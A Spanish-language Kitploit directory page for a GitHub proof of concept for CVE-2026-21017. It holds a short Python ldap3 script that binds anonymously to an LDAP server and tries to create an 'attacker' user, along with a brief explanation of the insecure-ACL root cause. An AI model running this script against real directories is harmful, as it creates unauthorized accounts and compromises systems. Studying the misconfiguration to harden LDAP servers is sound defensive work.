Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2026-21017-LDAP-Anonymous-Bind-Privilege-Escalation — Prueba de concepto en Python para la escalada de privilegios mediante bind anónimo de LDAP, simulando ACL inseguras para crear usuarios administradores a través de binds LDAP no autenticados. | Kitploit
Herramientas/GitHubGitHub/george0papasotiriou/cve-2026-21017-ldap-anonymous-bind-privilege-escalation
Autenticación y AutorizaciónEscalada de PrivilegiosAnálisis de VulnerabilidadesExplotaciónPruebas de PenetraciónMala Configuración
GitHubgeorge0papasotiriou/cve-2026-21017-ldap-anonymous-bind-privilege-escalation

CVE-2026-21017-LDAP-Anonymous-Bind-Privilege-Escalation

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

Prueba de concepto en Python para la escalada de privilegios mediante bind anónimo de LDAP, simulando ACL inseguras para crear usuarios administradores a través de binds LDAP no autenticados.

Ver Repositorio
hace 16 díasAún no revisado

CVE-2026-21017 – Escalada de Privilegios por Bind Anónimo LDAP

Código del programa (simulación Python ldap3)

root@kitploit:~
# ldap_anon_sim.py - LDAP server allowing anonymous bind with write access
from ldap3 import Server, Connection, ALL

# Simulated: real server would be misconfigured
server = Server('ldap://localhost:389', get_info=ALL)
conn = Connection(server, authentication='ANONYMOUS')
conn.bind()
# If anonymous has write permission to userPassword, can add self as admin
conn.add('uid=attacker,ou=people,dc=example,dc=com', ['inetOrgPerson'], {'uid': 'attacker', 'userPassword': 'password'})
print("User created anonymously!")

CVE-2026-21017 – Escalada de Privilegios por Bind Anónimo LDAP

Severity: Critical

Resumen

Un directorio LDAP está mal configurado para permitir binds anónimos y también otorga acceso de escritura a atributos sensibles (como userPassword). Un atacante puede realizar un bind anónimo y crear un nuevo usuario administrador, escalando privilegios.

Detalles de la Vulnerabilidad

  • Tipo: Control de Acceso Insuficiente
  • Impacto: Compromiso total del directorio.
  • Causa raíz: La lista de control de acceso (ACL) no restringe las escrituras a los usuarios autenticados.

Demostración del Exploit

Ejecute la simulación (requiere un servidor LDAP real para una prueba real, pero mostramos el concepto):

root@kitploit:~
python ldap_anon_sim.py

El script intenta añadir un usuario de forma anónima.

Descargar herramienta